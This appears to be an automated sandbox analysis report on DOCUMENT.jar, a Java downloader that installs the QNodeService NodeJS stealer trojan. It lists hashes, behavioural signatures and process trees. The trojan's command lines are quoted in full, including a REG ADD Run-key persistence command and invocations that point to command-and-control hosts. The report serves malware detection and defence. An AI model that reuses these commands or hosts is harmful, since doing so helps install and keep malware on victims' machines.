Analysis
-
max time kernel
69s -
max time network
145s -
platform
windows10_x64 -
resource
win10 -
submitted
07-07-2020 12:36
Static task
static1
Behavioral task
behavioral1
Sample
DOCUMENT.jar
Resource
win7v200430
Behavioral task
behavioral2
Sample
DOCUMENT.jar
Resource
win10
General
-
Target
DOCUMENT.jar
-
Size
11KB
-
MD5
5995a60cb5da5d0581926fc154ced6eb
-
SHA1
2b428a3f8f5c6d47e3cda97b0e62593a23c0a65a
-
SHA256
d598c592d48a490ec96d27cf4617c08908916d716e030eb0a7d79ba61d70d695
-
SHA512
6c595dc2183560043ababa811a60a42aa033b3eb414d1e79010e698d4126fe0eb78b879200c6fdcf92aec829de371883802d9078fec90e0bd9cc5d580656b31e
Malware Config
Signatures
-
Loads dropped DLL 4 IoCs
Processes:
node.exepid Process 1980 node.exe 1980 node.exe 1980 node.exe 1980 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid Process 1980 node.exe 1980 node.exe -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-e0cf7e07 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-e0cf7e07.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 wtfismyip.com 10 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
java.exenode.execmd.exedescription pid Process procid_target PID 3868 wrote to memory of 3476 3868 java.exe 68 PID 3868 wrote to memory of 3476 3868 java.exe 68 PID 3476 wrote to memory of 584 3476 node.exe 69 PID 3476 wrote to memory of 584 3476 node.exe 69 PID 584 wrote to memory of 648 584 cmd.exe 70 PID 584 wrote to memory of 648 584 cmd.exe 70 PID 3476 wrote to memory of 1980 3476 node.exe 71 PID 3476 wrote to memory of 1980 3476 node.exe 71 -
Executes dropped EXE 2 IoCs
Processes:
node.exenode.exepid Process 3476 node.exe 1980 node.exe -
QNodeService NodeJS Trojan 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x000100000001bfd3-116.dat family_qnodeservice
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\DOCUMENT.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://windowsdefender.theworkpc.com --central-base-url https://qhub.webredirect.org2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3476 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-e0cf7e07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-e0cf7e07.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-e0cf7e07" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-e0cf7e07.cmd\""4⤵
- Adds Run entry to start application
PID:648
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://windowsdefender.theworkpc.com --central-base-url https://qhub.webredirect.org3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Executes dropped EXE
PID:1980
-
-